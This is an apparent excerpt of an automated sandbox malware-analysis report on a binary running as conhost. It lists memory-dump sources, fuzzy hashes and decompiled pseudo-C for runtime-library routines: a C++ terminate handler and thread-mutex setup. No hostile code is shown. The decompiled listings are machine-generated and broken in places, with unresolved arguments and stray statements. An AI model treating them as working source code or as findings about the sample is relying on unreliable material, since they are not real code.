                        0x7ff6935f17b4
                        0x7ff6935f17b7
                        0x7ff6935f17c0
                        0x7ff6935f17c2
                        0x7ff6935f17d0
                        0x7ff6935f17db
                        0x7ff6935f17de
                        0x7ff6935f17f4
                        0x7ff6935f17f9
                        0x7ff6935f17ff
                        0x7ff6935f1807
                        0x7ff6935f1810
                        0x7ff6935f1812
                        0x7ff6935f1820
                        0x7ff6935f182b
                        0x7ff6935f182e
                        0x7ff6935f1844
                        0x7ff6935f1849
                        0x7ff6935f184f
                        0x7ff6935f1854
                        0x7ff6935f1857
                        0x7ff6935f1860
                        0x7ff6935f1862
                        0x7ff6935f1870
                        0x7ff6935f187b
                        0x7ff6935f187e
                        0x7ff6935f1894
                        0x7ff6935f1899
                        0x7ff6935f189f
                        0x7ff6935f18a7
                        0x7ff6935f18b0
                        0x7ff6935f18b2
                        0x7ff6935f18c0
                        0x7ff6935f18cb
                        0x7ff6935f18ce
                        0x7ff6935f18e4
                        0x7ff6935f18e9
                        0x7ff6935f18ef
                        0x7ff6935f18f7
                        0x7ff6935f1900
                        0x7ff6935f1902
                        0x7ff6935f1910
                        0x7ff6935f191b
                        0x7ff6935f191e
                        0x7ff6935f1934
                        0x7ff6935f1939
                        0x7ff6935f193f
                        0x7ff6935f1947
                        0x7ff6935f1950
                        0x7ff6935f1960
                        0x7ff6935f196e
                        0x7ff6935f1984
                        0x7ff6935f198f
                        0x7ff6935f1997
                        0x7ff6935f19a0
                        0x7ff6935f19b1
                        0x7ff6935f19b3
                        0x7ff6935f19c4
                        0x7ff6935f19c6
                        0x7ff6935f19d7
                        0x7ff6935f19d9
                        0x7ff6935f19ea
                        0x7ff6935f19ec
                        0x7ff6935f19f7
                        0x7ff6935f19f9
                        0x7ff6935f1a0a
                        0x7ff6935f1a0c
                        0x7ff6935f1a1d
                        0x7ff6935f1a1f
                        0x7ff6935f1a30
                        0x7ff6935f1a32
                        0x7ff6935f1a43
                        0x7ff6935f1a45
                        0x7ff6935f1a4e
                        0x7ff6935f1a56
                        0x7ff6935f1a5e
                        0x7ff6935f1a6d
                        0x7ff6935f1a77
                        0x7ff6935f1a82
                        0x7ff6935f1a87
                        0x7ff6935f1a91
                        0x7ff6935f1a93
                        0x7ff6935f1a9a
                        0x7ff6935f1aa1
                        0x7ff6935f1ab4
                        0x7ff6935f1ab9
                        0x7ff6935f1ac4
                        0x7ff6935f1acf
                        0x7ff6935f1ad7
                        0x7ff6935f1adb
                        0x7ff6935f1adf

                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: strlen$CaptureContextUnwindabortmalloc
                        • String ID: basic_string::_M_create
                        • API String ID: 214865124-3122258987
                        • Opcode ID: 8a1076d30abc1c720dabcdd976f0f24d5d258cee043a9d74d9cd453909d931a0
                        • Instruction ID: b065db76cf8bab041efc457feb1abc714d851ad0e67101f3d60d5ba24ebe4e47
                        • Opcode Fuzzy Hash: 8a1076d30abc1c720dabcdd976f0f24d5d258cee043a9d74d9cd453909d931a0
                        • Instruction Fuzzy Hash: 0A11CC44E0A24755EC68BA637C172BA5259FF4EBC9F8028B0EC0EFB386DD2CA1059345
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935C4040 Relevance: .0, Instructions: 16COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fe9eac2fc72e3075f8d3b2ce7c926098fc17b7bfbc30ab7d3e215ac876d6e874
                        • Instruction ID: c0f87e576fb24b15a197cbfe82def1137c520be43a88b9dc09588f5867696eca
                        • Opcode Fuzzy Hash: fe9eac2fc72e3075f8d3b2ce7c926098fc17b7bfbc30ab7d3e215ac876d6e874
                        • Instruction Fuzzy Hash: CCE09276A08B85C2D614DB52F88145EB774F79D7C4B105929EACC53B29CF3CD1A0CB40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935E2560 Relevance: 63.2, APIs: 13, Strings: 23, Instructions: 184fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 17%
                        			E00007FF67FF6935E2560(void* __edi, void* __eflags, void* __rbx, void* __rcx, void* __rdx, int __rdi, void* __rsi, void* __r12, char* __r13, int __r14, void* __r15) {
				void* _t43;
				void* _t75;
				void* _t93;
				void* _t94;
				intOrPtr _t100;
				long long* _t107;
				void* _t113;
				long long* _t114;
				long long* _t134;
				long long _t136;
				void* _t142;
				char* _t153;
				void* _t154;
				void* _t155;
				void* _t156;
				void* _t157;
				void* _t158;
				long long* _t170;

				_t93 = __edi;
				_t156 = _t155 - 0x90;
				_t154 = _t156 + 0x90;
				 *((long long*)(_t154 - 0x38)) = 0x7562206c;
				_t138 = __rdx - __rcx;
				 *((long long*)(_t154 - 0x40)) = 0x74696d62;
				 *((long long*)(_t154 - 0x30)) = 0x74726f70;
				_t5 = _t138 + 0x78; // 0x756f6e6520746fe6
				 *((long long*)(_t154 - 0x28)) = 0x70747468;
				 *((long long*)(_t154 - 0x20)) = 0x2e636367;
				 *((long long*)(_t154 - 0x18)) = 0x2f67726f;
				_t113 = __rdx - __rcx;
				 *((long long*)(_t154 - 0x70)) = 0x20746f6e;
				 *((long long*)(_t154 - 0x68)) = 0x73206867;
				 *((long long*)(_t154 - 0x60)) = 0x726f6620;
				 *((long long*)(_t154 - 0x58)) = 0x2074616d;
				 *((long long*)(_t154 - 0x50)) = 0x6f69736e;
				 *((long long*)(_t154 - 0x48)) = 0x7361656c;
				 *((long long*)(_t154 - 0x10)) = 0xa3a292f;
				 *((char*)(_t154 - 8)) = 0;
				E00007FF67FF6935CEA40(_t43);
				_t157 = _t156 - (_t5 & 0xfffffff0);
				 *((long long*)(_t157 + 0x58)) = 0x7562206c;
				 *((long long*)(_t157 + 0x50)) = 0x74696d62;
				 *((long long*)(_t157 + 0x68)) = 0x70747468;
				 *((long long*)(_t157 + 0x60)) = 0x74726f70;
				 *((long long*)(_t157 + 0x78)) = 0x2f67726f;
				_t142 = __rcx;
				 *((long long*)(_t157 + 0x80)) = 0xa3a292f;
				 *(_t157 + 0x20) = 0x20746f6e;
				 *((long long*)(_t157 + 0x28)) = 0x73206867;
				 *((long long*)(_t157 + 0x30)) = 0x726f6620;
				 *((long long*)(_t157 + 0x38)) = 0x2074616d;
				 *((long long*)(_t157 + 0x40)) = 0x6f69736e;
				 *((long long*)(_t157 + 0x48)) = 0x7361656c;
				 *((long long*)(_t157 + 0x70)) = 0x2e636367;
				memcpy(__rbx, __rsi, __rdi);
				 *((char*)(_t157 + _t113 + 0x88)) = 0;
				E00007FF67FF6935F16D0();
				0;
				0;
				_t158 = _t157 - 0x30;
				if ( *0x935f4140 != 0) goto 0x935e280a;
				 *0x935f4140 = 1;
				E00007FF67FF6935F0EF0(0x2e636367);
				if (0x2e636367 == 0) goto 0x935e27e0;
				 *((intOrPtr*)(_t158 + 0x2c)) = 0xffffffff;
				r8d = 0;
				E00007FF67FF6935CD5B0(0x2e636367,  *0x2E756E672E63636F + 0x2e636367, _t142, _t113, _t158 + 0x2c);
				_t114 =  *0x935f4050; // 0x7ff6935e10f0
				 *_t114();
				r8d = 0x30;
				fwrite(_t113, _t157 + 0x20);
				if ( *((intOrPtr*)(_t158 + 0x2c)) == 0) goto 0x935e27d1;
				 *_t114();
				fputs(__r13);
				 *_t114();
				r8d = 2;
				fwrite(__r12, __r14);
				_t100 =  *((intOrPtr*)(_t158 + 0x2c));
				if (_t100 != 0) goto 0x935e27cc;
				free(__r15);
				E00007FF67FF6935F1440(2, 1, 0x2e636367, _t114, _t113, 0x2e636367,  *0x2E756E672E63636F + 0x2e636367, 0x2e636367);
				 *_t114();
				fputs(_t153);
				goto 0x935e279b;
				 *0x935f4050();
				r8d = 0x2d;
				fwrite(??, ??, ??, ??);
				abort();
				 *0x935f4050();
				r8d = 0x1d;
				fwrite(??, ??, ??, ??);
				abort();
				if (_t100 != 0) goto 0x935e289f;
				0x935f0d40();
				_t107 =  *0x2e636367;
				 *((intOrPtr*)(_t107 + 0x10))();
				 *_t114();
				_t170 = _t107;
				r8d = 0xb;
				fwrite(??, ??, ??, ??);
				 *_t114();
				fputs(??, ??);
				 *_t114();
				fputc(??, ??);
				E00007FF67FF6935F0F50(_t107);
				goto 0x935e2805;
				0x935f0d40();
				E00007FF67FF6935F0F50(_t107);
				_t178 = _t107;
				E00007FF67FF6935F0F50(_t107);
				_t134 = _t107;
				E00007FF67FF6935CF280();
				E00007FF67FF6935F0CD0(_t93, _t94, _t107, _t134);
				 *_t107 = 0x935f90e0;
				_t75 = E00007FF67FF6935F1490(8, 1, 0x935f90e0, _t114, _t107, 0x935f8ad0, 0x7ff6935e2510, _t170, _t178, 0x2e636367);
				_t136 =  *0x935f4110; // 0x2954bcb0080
				if (_t136 == 0) goto 0x935e2910;
				free(??);
				 *0x935f4110 = 0;
				return _t75;
			}





















                        0x7ff6935e2560
                        0x7ff6935e256a
                        0x7ff6935e2571
                        0x7ff6935e25c2
                        0x7ff6935e25da
                        0x7ff6935e25dd
                        0x7ff6935e25eb
                        0x7ff6935e25ef
                        0x7ff6935e25fd
                        0x7ff6935e260f
                        0x7ff6935e261d
                        0x7ff6935e2621
                        0x7ff6935e2624
                        0x7ff6935e2628
                        0x7ff6935e262c
                        0x7ff6935e2630
                        0x7ff6935e2634
                        0x7ff6935e2638
                        0x7ff6935e263c
                        0x7ff6935e2640
                        0x7ff6935e2644
                        0x7ff6935e2653
                        0x7ff6935e2663
                        0x7ff6935e2677
                        0x7ff6935e2686
                        0x7ff6935e2695
                        0x7ff6935e26a4
                        0x7ff6935e26a9
                        0x7ff6935e26ac
                        0x7ff6935e26bc
                        0x7ff6935e26c1
                        0x7ff6935e26c6
                        0x7ff6935e26cb
                        0x7ff6935e26d0
                        0x7ff6935e26d5
                        0x7ff6935e26da
                        0x7ff6935e26df
                        0x7ff6935e26e7
                        0x7ff6935e26ef
                        0x7ff6935e26fa
                        0x7ff6935e26fe
                        0x7ff6935e2705
                        0x7ff6935e2710
                        0x7ff6935e2716
                        0x7ff6935e271d
                        0x7ff6935e2725
                        0x7ff6935e273b
                        0x7ff6935e2746
                        0x7ff6935e2751
                        0x7ff6935e275b
                        0x7ff6935e2765
                        0x7ff6935e2773
                        0x7ff6935e277c
                        0x7ff6935e278c
                        0x7ff6935e278e
                        0x7ff6935e2796
                        0x7ff6935e27a0
                        0x7ff6935e27a2
                        0x7ff6935e27b7
                        0x7ff6935e27c0
                        0x7ff6935e27c2
                        0x7ff6935e27c7
                        0x7ff6935e27cc
                        0x7ff6935e27d1
                        0x7ff6935e27d9
                        0x7ff6935e27de
                        0x7ff6935e27e5
                        0x7ff6935e27eb
                        0x7ff6935e2800
                        0x7ff6935e2805
                        0x7ff6935e280f
                        0x7ff6935e2815
                        0x7ff6935e282a
                        0x7ff6935e282f
                        0x7ff6935e283b
                        0x7ff6935e283d
                        0x7ff6935e2845
                        0x7ff6935e2848
                        0x7ff6935e2853
                        0x7ff6935e2855
                        0x7ff6935e2858
                        0x7ff6935e286a
                        0x7ff6935e2874
                        0x7ff6935e287c
                        0x7ff6935e2886
                        0x7ff6935e2890
                        0x7ff6935e2895
                        0x7ff6935e289a
                        0x7ff6935e289f
                        0x7ff6935e28a4
                        0x7ff6935e28ae
                        0x7ff6935e28b1
                        0x7ff6935e28b6
                        0x7ff6935e28b9
                        0x7ff6935e28c9
                        0x7ff6935e28e6
                        0x7ff6935e28e9
                        0x7ff6935e28f4
                        0x7ff6935e28fe
                        0x7ff6935e2900
                        0x7ff6935e2905
                        0x7ff6935e2914

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: fwrite$fputs$abortfreememcpy$fputcstrlen
                        • String ID: what(): $ for for$/): $bmit ful$bmit ful$gcc.gnu.$gcc.gnu.$gh space$https://$https://$l bug re$l bug re$lease su$mat expa$not enou$nsion (P$org/bugs$org/bugs$port at $port at $terminate called after throwing an instance of '$terminate called recursively$terminate called without an active exception
                        • API String ID: 1586115568-1351603976
                        • Opcode ID: de2f6cc281b7ae6d443784ed337ef4c4990e2612a298669d1a648d2f37b8b72c
                        • Instruction ID: ceae7b5b22d09f142d878025016e483b604d63caf1a2089a0cf5ab5b9105c57e
                        • Opcode Fuzzy Hash: de2f6cc281b7ae6d443784ed337ef4c4990e2612a298669d1a648d2f37b8b72c
                        • Instruction Fuzzy Hash: 56710661B0874146FB30ABA2B8467BD76A9FB49B84F544178ED9DA7BCADE3CD104C301
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935CEC00 Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 157synchronizationCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: AtomMutex$CloseCreateCurrentFindHandleObjectProcessReleaseSingleWait_onexit
                        • String ID: __eh_shmem3_gcc_tdm_$aaaaaaaa$aaaaaaaa$failed to add string to atom table$failed to get string from atom$failed to to lock creation mutex
                        • API String ID: 2382646235-4003979217
                        • Opcode ID: bf1e105220a97cb527f675185c6b9909b0a7e652d6da0020295db7e9e489d043
                        • Instruction ID: cc101a6ee0fd516a72a548e3d787f2886c95eed090114b9ba88be0742e50cc6f
                        • Opcode Fuzzy Hash: bf1e105220a97cb527f675185c6b9909b0a7e652d6da0020295db7e9e489d043
                        • Instruction Fuzzy Hash: 9661B375E0DA4791FF358B26E8032B52798FF58786F8084B5C95EE7290EE3CA505E300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935D28E0 Relevance: 24.4, APIs: 16, Instructions: 450COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00007FF67FF6935D28E0(void* __edx, void* __r8) {

				if (__edx != 0) goto 0x935d2908;
				if (__r8 == 0) goto 0x935d2948;
				return 1;
			}



                        0x7ff6935d28ed
                        0x7ff6935d28f2
                        0x7ff6935d2904

                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CloseHandleValue$ExceptionHandlerRemoveVectored
                        • String ID:
                        • API String ID: 2941551293-0
                        • Opcode ID: 043dcb9ba3a615ab50d376f0fa0b1e3dd335128a17022762d9f12ddf64c4e346
                        • Instruction ID: 0c0d7d1b1c5e56debcb2120e736861be781aa1a389731c596ff0fbf73387fcb9
                        • Opcode Fuzzy Hash: 043dcb9ba3a615ab50d376f0fa0b1e3dd335128a17022762d9f12ddf64c4e346
                        • Instruction Fuzzy Hash: CE223731A09B0685FA749B22D49637823A8FF4CB98F5405B6DA2DA73E5DF3CE445D301
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935D6330 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 60synchronizationCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CloseHandleMutex$AtomCreateFindObjectReleaseSingleWait
                        • String ID: JiAlAaAa__shmem3_winpthreads_tdm_$__shmem3_winpthreads_tdm_-aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAaAaaAaaAAaAAaaaaaaaAaaaAAAAAaaaa$failed to to lock cleanup mutex
                        • API String ID: 3776795807-314959845
                        • Opcode ID: cca8fa040cd36adcd71f5b5738974d92ba3a1bc4b9603ae438584e591e5e5248
                        • Instruction ID: 18d83ee2efdf5612ee8a135367f66f33401dc9d668e585e67f85152f18bfaf61
                        • Opcode Fuzzy Hash: cca8fa040cd36adcd71f5b5738974d92ba3a1bc4b9603ae438584e591e5e5248
                        • Instruction Fuzzy Hash: E5214530A09A4381FE759B62D8571382399FF48B85B9495B6D82DFB790EF3CE446D310
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935CF000 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 129COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: ExceptionRaiseUnwindabort
                        • String ID: CCG $CCG!$CCG!$CCG"
                        • API String ID: 4140830120-3707373406
                        • Opcode ID: 224a963650e0a92e267060df980812569b314a0e2d81e6bbb01a8786489569fe
                        • Instruction ID: 6185589544e7fd56c10212568d34e7d10318320af947ac0172ba0db8aff37394
                        • Opcode Fuzzy Hash: 224a963650e0a92e267060df980812569b314a0e2d81e6bbb01a8786489569fe
                        • Instruction Fuzzy Hash: 16517036608B8086D7708F55E8816AD73A8F789B98F644136EE8EA3B58CF3DD491C740
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935D15E0 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 51threadCOMMON
                        Download Yara Rule
                        C-Code - Quality: 46%
                        			E00007FF67FF6935D15E0(void* __edi, void* __esp, void* __rbx, void* __rdi, void* __rsi, void* __rbp, void* __r12, void* __r13, void* __r14, void* __r15) {
				char _v14;
				short _v16;
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				long long _v64;
				long long _v72;
				long long _v80;
				char _v81;
				long long _v88;
				long long _v96;
				long long _v104;
				long long _v112;
				char _v120;
				void* _t206;
				signed int _t214;
				intOrPtr _t220;
				void* _t281;
				intOrPtr _t340;
				intOrPtr _t341;
				intOrPtr _t342;
				intOrPtr _t343;
				intOrPtr _t344;
				intOrPtr _t347;
				intOrPtr _t348;
				intOrPtr _t350;
				intOrPtr _t351;
				intOrPtr _t353;
				intOrPtr _t354;
				intOrPtr _t355;
				intOrPtr _t357;
				intOrPtr _t358;
				intOrPtr _t359;
				intOrPtr _t361;
				intOrPtr _t363;
				intOrPtr _t366;
				intOrPtr _t367;
				intOrPtr _t369;
				intOrPtr _t372;
				intOrPtr _t375;
				intOrPtr _t377;
				intOrPtr _t378;
				intOrPtr _t380;
				intOrPtr _t383;
				intOrPtr _t384;
				intOrPtr _t386;
				intOrPtr _t389;
				intOrPtr _t391;
				intOrPtr _t392;
				intOrPtr _t394;
				intOrPtr _t395;
				intOrPtr _t401;
				intOrPtr _t402;
				intOrPtr* _t405;
				void* _t406;
				void* _t412;
				intOrPtr* _t413;
				signed long long _t415;
				void* _t436;
				signed long long _t482;
				void* _t492;
				long long _t494;
				intOrPtr* _t496;
				intOrPtr* _t497;
				void* _t498;
				void* _t499;
				void* _t517;
				void* _t518;
				void* _t526;
				void* _t536;

				_t499 = _t498 - 0x98;
				_v120 = 0x6f727245;
				_v112 = 0x696e6165;
				_v104 = 0x70732070;
				_v96 = 0x20737965;
				_v88 = 0x65726874;
				_v80 = 0x20737965;
				_v72 = 0;
				_v64 = 0;
				_v56 = 0;
				_v48 = 0;
				_v40 = 0;
				_v32 = 0;
				_v24 = 0;
				_v16 = 0;
				_v14 = 0;
				GetCurrentThreadId();
				r8d = 0xa;
				__imp___ultoa();
				if (_v81 == 0) goto 0x935d16f2;
				goto 0x935d16ca;
				if (0x65726874 == 0x6b) goto 0x935d16e7;
				if ( *((char*)( &_v120 + 0x65726874)) != 0) goto 0x935d16c0;
				if (0 == 0x6a) goto 0x935d16e7;
				 *((char*)(_t499 + 0x48)) = 0xa;
				 *((char*)(_t499 + 0x20646165726895)) = 0;
				OutputDebugStringA(??);
				abort();
				goto 0x935d16db;
				asm("o16 nop [cs:eax+eax]");
				_t405 =  &_v120;
				E00007FF67FF6935D02C0( &_v120);
				E00007FF67FF6935CF8A0(0x2064616572687d);
				_t220 =  *_t405;
				if (_t220 != 0) goto 0x935d1760;
				E00007FF67FF6935D1520();
				 *_t405 = 1;
				E00007FF67FF6935CFBC0(0x2064616572687d);
				_pop(_t406);
				_pop(_t492);
				_pop(_t517);
				_pop(_t526);
				goto E00007FF67FF6935D04D0;
				if (_t220 == 1) goto 0x935d1742;
				 *0x935f4050();
				r9d = _t220;
				0x935e0a98();
				goto 0x935d1742;
				asm("o16 nop [eax+eax]");
				_t496 =  *0x935f8900; // 0x7ff6936023e0
				_t340 =  *_t496;
				if (_t340 == 0) goto 0x935d18d8;
				if ( *((long long*)(_t340 + 0x60)) != 0) goto 0x935d1900;
				 *((long long*)(_t340 + 0x60)) = 0x935f3fa8;
				E00007FF67FF6935CF8A0(0x935f3fa8);
				if ( *((intOrPtr*)(0x20646165726a4d)) != 0) goto 0x935d19b0;
				if ( *0x206461657268C5 == 0) goto 0x935d17f0;
				free(_t406);
				if ( *0x206461657268CD == 0) goto 0x935d17fe;
				free(_t492);
				if ( *0x206461657268D5 == 0) goto 0x935d180c;
				free(__rdi);
				 *((long long*)(0x20646165726875)) = 0;
				 *((long long*)(0x20646165726a4d)) = 0;
				memset(__edi, 0, 2 << 0);
				_t341 =  *_t496;
				if (_t341 == 0) goto 0x935d1b18;
				if ( *((long long*)(_t341 + 0x58)) != 0) goto 0x935d1910;
				 *((long long*)(_t341 + 0x58)) = 0x93602390;
				if ( *0x93602390 == 0) goto 0x935d191e;
				if ( *((long long*)(_t341 + 0x58)) != 0) goto 0x935d1980;
				 *((long long*)(_t341 + 0x58)) = 0x93602390;
				 *((long long*)( *0x93602390 + 0x1d0)) = 0x20646165726875;
				if ( *((long long*)(_t341 + 0x58)) == 0) goto 0x935d19a0;
				 *((long long*)( *((intOrPtr*)(_t341 + 0x58)))) = 0x20646165726875;
				if (_t341 == 0) goto 0x935d1963;
				_t214 = 0 |  *((long long*)(_t341 + 0x60)) != 0x00000000;
				if (_t214 == 0) goto 0x935d1989;
				if (_t341 == 0) goto 0x935d1df0;
				_pop(_t494);
				_t497 = _t517;
				_t518 = _t526;
				_pop(_t536);
				goto E00007FF67FF6935CFBC0;
				E00007FF67FF6935D6420();
				_t342 =  *_t497;
				if ( *((long long*)(_t341 + 0x60)) == 0) goto 0x935d17c2;
				if (_t342 != 0) goto 0x935d1900;
				E00007FF67FF6935D6420();
				asm("o16 nop [cs:eax+eax]");
				goto 0x935d17cd;
				if ( *((long long*)( *((intOrPtr*)(_t342 + 0x58)))) != 0) goto 0x935d1867;
				if ( *((long long*)(_t342 + 0x58)) != 0) goto 0x935d1a98;
				 *((long long*)(_t342 + 0x58)) = 0x93602390;
				 *0x93602390 = _t494;
				if ((_t214 & 0xffffff00 |  *((long long*)(_t342 + 0x50)) != 0x00000000) == 0) goto 0x935d1bcd;
				if (_t342 == 0) goto 0x935d204c;
				 *((long long*)( *((intOrPtr*)(_t342 + 0x50)))) =  *0x93602390;
				if (_t342 != 0) goto 0x935d18a2;
				E00007FF67FF6935D6420();
				_t343 =  *_t497;
				goto 0x935d18aa;
				goto 0x935d187d;
				 *((long long*)(_t343 + 0x60)) = 0x935f3fa8;
				goto 0x935d18bf;
				 *((long long*)(_t343 + 0x58)) = 0x93602390;
				goto 0x935d1896;
				_t344 =  *_t497;
				if (_t344 == 0) goto 0x935d1e00;
